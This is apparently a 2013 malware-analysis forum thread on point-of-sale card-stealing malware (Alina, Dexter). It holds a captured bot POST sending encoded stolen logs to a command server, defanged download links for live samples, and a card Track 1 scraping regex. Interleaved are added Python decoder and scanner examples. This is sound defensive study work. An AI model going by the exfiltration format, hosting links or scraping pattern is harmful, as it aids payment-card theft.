A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18009  by bsteo
 Sun Feb 03, 2013 12:02 pm
Awesome xylitol, you've just ruined my Sunday :)
Now I have work to do.

Just took a look at the second sample (v2.1) from your previous post. It sent this to my fake PHP panel:
Code:
DATA: a:5:{s:3:"act";s:1:"l";s:1:"b";s:8:"982f17d9";s:1:"c";s:15:"XTMTRX-8D35CB4";s:1:"v";s:4:"v2.1";s:5:"ldata";s:326:"f0c2c5d8dfcac7c7c8c3cec8c091999bf68befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce8bcac7c2c5ca96e891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7efced8c0dfc4dbf7c9c4dff4cecf85ced3cea1f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df68bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf8bd8dec8c8ced8d8cddec7c7d2a1";}
Now figuring out what's the encryption on the POST variable "ldata" (log data).
 #18010  by Xylitol
 Sun Feb 03, 2013 12:26 pm
Alina 3.4 sample attached
In the wild: hxtp://pierremoreau.ca/backup2011/3_4.exe
https://www.virustotal.com/file/036e4f4 ... 359894166/ > 28/46
Code:
POST /forum/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v3.4
Host: 208.98.63.228
Content-Length: 642
Cache-Control: no-cache

act=l&b=8a43ad2&c=XYL2K-E87171510&v=v3.4&p=C:\3_4.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9a9c8b979b95f68befcec7cedfcecf8be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7dcc2c586cdc2d9cedccac7c785ced3ce8bcdd9c4c68bc4c7cf8bd8cedfdedb858bcfcec7cedfc2c5cc8bcadedfc4d8dfcad9df85a1f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1ded8c8c3cedf85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f798f49f85ced3cea1

HTTP/1.1 666 OK
Server: nginx/1.0.15
Date: Sun, 03 Feb 2013 12:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

8
li:2:120
0
Attachments
infected
(59.4 KiB) Downloaded 122 times
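The "ldata" field bsteo is asking about, and the same field in the v3.4 request above, is the bot's log text XORed with a single fixed byte and hex-encoded. The following decoder is an added example, not code from this thread or from the malware's panel: it rebuilds the v2.1 values bsteo's fake panel logged as a raw urlencoded POST body (that framing is constructed; the field values are the ones on the page), brute-forces the XOR key by scoring each candidate plaintext for letters and spaces, and returns the check-in fields with the decoded log. The scoring heuristic and the function names are my own assumptions. The v3.4 ldata in the post above decodes with the same key.

```python
import string
from typing import Optional
from urllib.parse import parse_qs

# Hex blob of the "ldata" field exactly as bsteo's fake panel logged it (v2.1 sample),
# split into short pieces only for readability.
LDATA_HEX = (
    "f0c2c5d8dfcac7c7c8c3cec8c091999bf6"
    "8befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce"
    "8bcac7c2c5ca96e891f7"
    "efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7"
    "eacfc6c2c5c2d8dfd9cadfc4d9f7efced8c0dfc4dbf7"
    "c9c4dff4cecf85ced3cea1"
    "f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df6"
    "8bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf"
    "8bd8dec8c8ced8d8cddec7c7d2a1"
)

# Constructed: the same fields rebuilt as the raw urlencoded POST body the bot
# would have sent (the page shows them as a PHP-serialized array instead).
SAMPLE_POST_BODY = "act=l&b=982f17d9&c=XTMTRX-8D35CB4&v=v2.1&ldata=" + LDATA_HEX


def text_score(buf: bytes) -> int:
    """Plausibility score for a candidate plaintext (assumed heuristic):
    letters and spaces count for it, bytes that are neither printable
    nor whitespace count heavily against it."""
    score = 0
    for b in buf:
        ch = chr(b)
        if ch in string.ascii_letters or ch == " ":
            score += 1
        elif ch not in string.printable:
            score -= 5
    return score


def recover_xor_key(data: bytes) -> int:
    """Try all 256 single-byte XOR keys and keep the most text-like result."""
    return max(range(256), key=lambda k: text_score(bytes(b ^ k for b in data)))


def decode_ldata(hex_blob: str, key: Optional[int] = None):
    """Return (key, plaintext) for an ldata hex blob; brute-forces the key if not given."""
    raw = bytes.fromhex(hex_blob)
    if key is None:
        key = recover_xor_key(raw)
    return key, bytes(b ^ key for b in raw).decode("latin-1")


def parse_checkin(body: str) -> dict:
    """Split a check-in POST body into its fields and attach the decoded log."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    key, log = decode_ldata(fields["ldata"])
    fields["ldata_key"] = key
    fields["ldata_plain"] = log
    return fields


if __name__ == "__main__":
    info = parse_checkin(SAMPLE_POST_BODY)
    print("bot id:", info["b"], "host:", info["c"], "version:", info["v"])
    print("XOR key: 0x%02x" % info["ldata_key"])
    print(info["ldata_plain"])
```

Once the key is known, a sinkhole or fake panel can store the decoded log next to the check-in parameters (act, b, c, v, and p in the v3.4 request) instead of the hex blob; the brute-force step is only needed once per sample family, after which the key can be passed to decode_ldata directly.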
 #18013  by aaSSfxxx
 Sun Feb 03, 2013 5:32 pm
Btw got new stuff on hXXp://royjamesinsurance.com/images/ .

This time, no sql server creds in command strings :( (malware attached).
Same shit as the sample I posted before.
https://www.virustotal.com/file/6d4d91f ... 359968332/ > 10/46
Attachments
infected
(35.54 KiB) Downloaded 89 times
Last edited by Xylitol on Mon Feb 04, 2013 9:00 am, edited 1 time in total. Reason: Link obfuscation
 #18042  by Buster_BSA
 Tue Feb 05, 2013 4:38 pm
Xylitol wrote: fresh Troj/Trackr-Gen
https://www.virustotal.com/file/f72a63c ... 360071120/ > 19/46
Code:

 Report generated with Buster Sandbox Analyzer 1.87 at 17:36:13 on 05/02/2013

 [ General information ]
   * Analysis duration: 00:00:30
   * File name: c:\m\test\f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8.exe
   * File length: 128000 bytes
   * File signature (PEiD): Borland Delphi 6.0 - 7.0
   * File signature (Exeinfo): Borland Delphi ( 2.0 - 7.0 ) 1992 - www.borland.com
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 6.50491 (81.3113%)
   * ssdeep signature: 3072:giYkr6DJ2ZUSlcCwDesr/QOOGXbn4DQFu/U3buRKlemZ9DnGAeJo5CQh6BrUO3ss:Bv+KFiDXL4DQFu/U3buRKlemZ9DnGAeK
   * Adobe Malware Classifier: Malicious
   * Digital signature: Unsigned
   * MD5 hash: aef00dcd16d6aad056a345ac320a8d99
   * SHA1 hash: 48db3a315d9e8bc0bce2c99cfde3bb9224af3dce
   * SHA256 hash: f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * No changes

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Enumerates running processes.
   * Contains string Point-of-sale information stealer ("((b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1})")
   * Sleeps 30 seconds.
 #18055  by bsteo
 Wed Feb 06, 2013 3:36 pm
gritland wrote: someone has an unpacked version of Dexter?
Interested too. I unpacked one with Volatility but it seems I've broken it somewhere; it runs but gives an error.
 #18059  by bsteo
 Wed Feb 06, 2013 4:32 pm
Little harmless code I made to trigger any POS malware to grab and send data to C&C. Attached compiled with VS10. Code as follows:
Code:
#include <iostream>
#include <conio.h>    // getch(): MSVC/Windows only, matches the VS10 build mentioned above
#include <windows.h>

using namespace std;

// Bogus Track 1 and Track 2 style strings (PAN^NAME^expiry... and PAN=expiry...);
// the card numbers are fake test data.
char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	// Print the strings so they sit in this process's memory while it waits
	cout << track1 << endl;
	cout << track2 << endl;
	getch();   // keep the process alive until a key is pressed
	return 0;
}
Attachments
password: "infected"
(44.55 KiB) Downloaded 168 times
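As an added example that is not from the sandbox report, from bsteo's harness or from anyone in this thread, here is the Track 1 regex quoted in Buster_BSA's report applied to the two test strings from the harness above, plus a Luhn check on the PAN it extracts. The regex is copied from the report as-is; the Luhn helper, the scan wrapper and their names are my own additions. One thing worth knowing when building bait data for detection testing: both card numbers in the harness fail the Luhn checksum, so any rule that additionally requires a Luhn-valid PAN would not fire on them.

```python
import re

# Track 1 pattern exactly as it appears in the Buster Sandbox Analyzer report above
# (its "Point-of-sale information stealer" string match), compiled with Python's re.
TRACK1_RE = re.compile(
    r"(b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^"
    r"(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1}"
)

# The two bogus strings from bsteo's test program (fake card numbers, as labelled there).
TRACK1 = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?"
TRACK2 = "4744870016311111=14091010000000000072"


def luhn_valid(pan: str) -> bool:
    """Luhn checksum: double every second digit from the right, subtract 9 if > 9."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_track1(buf: str):
    """Return the first Track 1 match in buf (without the % and ? sentinels), or None."""
    m = TRACK1_RE.search(buf)
    return m.group(0) if m else None


def scan_buffer(buf: str) -> list:
    """All Track 1 hits in buf, each with its PAN and whether the PAN passes Luhn."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(0)[1:].split("^", 1)[0]
        hits.append({"track1": m.group(0), "pan": pan, "luhn": luhn_valid(pan)})
    return hits


if __name__ == "__main__":
    for hit in scan_buffer(TRACK1 + "\n" + TRACK2):
        print(hit)
```

The report's regex only covers Track 1 (the format with the cardholder name), which is why the harness's Track 2 string produces no hit here; a scanner that also wants Track 2 needs a separate pattern for the PAN=expiry layout.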